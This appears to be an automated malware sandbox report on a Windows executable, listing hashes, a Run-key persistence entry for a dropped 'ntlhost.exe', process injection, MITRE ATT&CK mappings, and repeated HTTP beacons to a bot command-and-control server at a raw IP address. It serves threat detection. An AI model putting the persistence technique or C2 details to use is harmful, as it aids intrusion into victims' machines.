33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a

General

Target

33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe
Size

1.8MB
MD5

93d72e8488c9e0d46eafbc0c4e4d587b
SHA1

4cff0799e86f0f0bdfe2679fffa348c318be8e0d
SHA256

33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a
SHA512

74b01081326194c9f95bd69ff777e6df6ca9cfcf9e4e6f65fb8ba62a7d542ce7a9d21da5e791bf2430d4524d3afb35a55026e384cc6543c8fafe25b976d3fa73
SSDEEP

49152:3yy5PZx+dW5BvZelG955YIby5+K+VcvUU:B5SdWDvZel05Lbykfuv

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
480	ntlhost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe"	33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	25	Go-http-client/1.1

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2496 wrote to memory of 480	2496	33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe	87
PID 2496 wrote to memory of 480	2496	33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe	87
PID 2496 wrote to memory of 480	2496	33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe	87

C:\Users\Admin\AppData\Local\Temp\33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe
"C:\Users\Admin\AppData\Local\Temp\33ee5b851a561fdd66890831f2702d20cadebeff8e7200b1092e28fe5bb5300a.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
  C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
  2⤵
  - Executes dropped EXE
  PID:480

Network

GET

http://45.87.154.105/bot/regex

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:01:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:01:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.87.154.105/bot/regex

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:02:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:02:17 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive
GET

http://45.87.154.105/bot/regex

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/regex HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:03:18 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 633
Connection: keep-alive
GET

http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

ntlhost.exe

Remote address:

45.87.154.105:80

Request

GET /bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin HTTP/1.1
Host: 45.87.154.105
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip

Response

HTTP/1.1 200 OK

Server: nginx/1.14.2
Date: Fri, 03 Feb 2023 14:03:18 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 2
Connection: keep-alive

8.238.110.126:80

322 B
7
13.78.111.198:443

322 B
7
45.87.154.105:80

http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

http

ntlhost.exe

1.5kB
3.5kB
14
13

HTTP Request

GET http://45.87.154.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

HTTP Response

200

HTTP Request

GET http://45.87.154.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

HTTP Response

200

HTTP Request

GET http://45.87.154.105/bot/regex

HTTP Response

200

HTTP Request

GET http://45.87.154.105/bot/online?key=1c630872d348a77d04368d542fde4663bc2bcb96f1b909554db3472c08df2767&guid=IYMUGYHL\Admin

HTTP Response

200
88.221.25.155:80

322 B
7
88.221.25.155:80

322 B
7
8.238.110.126:80

322 B
7
8.247.211.254:80

322 B
7
204.79.197.203:80

322 B
7

No results found

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
744.8MB

MD5
768bf515685ca0420a4a2c7e4aa62e37

SHA1
f6d380b1311561033a927d5336eb744e6aba9733

SHA256
a27aaa02ea6ffa4c2928502adf5a1cd01418b76752a55d80d77688afbdae488a

SHA512
6c5c8e7b896c66cfc228d7dec09f352938aaa36fa90cabae88a23b11a7103bb6918a4fb62692ab68c8102d639ab318bb061a8b1dce4b55d3c31f27e55170edf0

Download Submit
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Filesize
744.8MB

MD5
768bf515685ca0420a4a2c7e4aa62e37

SHA1
f6d380b1311561033a927d5336eb744e6aba9733

SHA256
a27aaa02ea6ffa4c2928502adf5a1cd01418b76752a55d80d77688afbdae488a

SHA512
6c5c8e7b896c66cfc228d7dec09f352938aaa36fa90cabae88a23b11a7103bb6918a4fb62692ab68c8102d639ab318bb061a8b1dce4b55d3c31f27e55170edf0

Download Submit
memory/480-139-0x00000000025B1000-0x000000000275B000-memory.dmp

Filesize
1.7MB

Download
memory/480-140-0x0000000000400000-0x0000000000803000-memory.dmp

Filesize
4.0MB

Download
memory/480-141-0x0000000000400000-0x0000000000803000-memory.dmp

Filesize
4.0MB

Download
memory/2496-132-0x00000000025FC000-0x00000000027A6000-memory.dmp

Filesize
1.7MB

Download
memory/2496-133-0x00000000027B0000-0x0000000002B80000-memory.dmp

Filesize
3.8MB

Download
memory/2496-134-0x0000000000400000-0x0000000000803000-memory.dmp

Filesize
4.0MB

Download
memory/2496-138-0x0000000000400000-0x0000000000803000-memory.dmp

Filesize
4.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.